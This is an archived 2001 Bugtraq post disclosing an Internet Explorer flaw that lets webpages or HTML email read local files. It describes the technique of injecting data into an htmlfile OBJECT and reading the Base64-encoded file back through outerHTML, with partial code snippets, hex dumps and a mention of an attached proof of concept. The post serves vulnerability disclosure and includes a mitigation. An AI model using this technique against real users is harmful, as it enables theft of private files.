Home page logo

bugtraq logo Bugtraq mailing list archives

Internet Explorer allows reading of local files by remote webpages
From: Markus Kern <markus-kern () gmx net>
Date: Sun, 25 Nov 2001 11:52:04 +0100


There is a vulnerability in MS Internet Explorer that allows
any webpage or HTML email to read arbitrary local files.
This bug may also lead to remote command execution.

Vulnerable versions

All versions of IE seem to be affected. The following
configurations have been tested and are vulnerable:

Windows 2000 pro, IE 5.50
Windows 2000 pro SP2, IE 6.0, fully patched
Windows XP pro, IE 6.0


Disable ActiveX in Internet Explorer

Exploit details

The exploit is based on a very vague advisory postet to
vuln-dev () securityfocus com by NOMEN NESCIO SECURITY ALERT
<hush.little.baby () hushmail com> on 21/11/2001:

Marc Fossi <mfossi () securityfocus com> suggests that this may be
another way to exploit an old vulnerability discovered by
Georgi Guninski: http://www.securityfocus.com/bid/1718

First we create either a "htmlfile_FullWindowEmbed" or a
"htmlfile" object (both work):

<OBJECT ID="myObject"

Ok, alert(myObject.outerHTML); gives us the following:

<OBJECT id=myObject
OzwvcD4= ></OBJECT>

Decoding the Base64 string we get (hex dump):

20693325F903CF11 8FD000AA00686F13  .i3%.........ho.
3C703E266E627370 3B3C2F703E        <p>&nbsp;</p>

The first part is a GUID and the second one looks like HTML.
We inject the string
into the object using

<OBJECT ID="myObject"

(There are probably easier ways to do this but I'm not very familiar
with IE coding).

Now to the the interesting part. After c:\test.txt is loaded we can
still access the data parameter of the object using myObject.outerHTML.
This time it contains the Base64 encoded version of c:\test.txt among
other things.

So doing a alert(myObject.outerHTML); after the local file is loaded
we get:

<OBJECT id=myObject

with the Base64 string decoding to:

20693325F903CF11 8FD000AA00686F13  .i3%.........ho.
3C21444F43545950 452048544D4C2050  <!DOCTYPE.HTML.P
55424C494320222D 2F2F5733432F2F44  UBLIC."-//W3C//D
54442048544D4C20 342E30205472616E  TD.HTML.4.0.Tran
736974696F6E616C 2F2F454E223E0D0A  sitional//EN">..
3C48544D4C3E3C48 4541443E0D0A3C4D  <HTML><HEAD>..<M
4554412068747470 2D65717569763D43  ETA.http-equiv=C
6F6E74656E742D54 79706520636F6E74  ontent-Type.cont
656E743D22746578 742F68746D6C3B20  ent="text/html;.
636861727365743D 77696E646F77732D  charset=windows-
31323532223E3C2F 484541443E0D0A3C  1252"></HEAD>..<
424F44593E3C584D 503E68656C6C6F20  BODY><XMP>hello.
776F726C643C2F58 4D503E3C2F424F44  world</XMP></BOD
593E3C2F48544D4C 3E0D0A            Y></HTML>..    

where "hello world" is the contents of c:\test.txt.

It all boils down to an ordinary DOM circumvention with all the
usual implications.

Proof of concept exploit

I have attached a zipped HTML file that reads c:\test.txt and
displays it.

Markus Kern

Attachment: htmlfile_FWE-exploit.zip

  By Date           By Thread  

Current thread:
  • Internet Explorer allows reading of local files by remote webpages Markus Kern (Nov 26)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]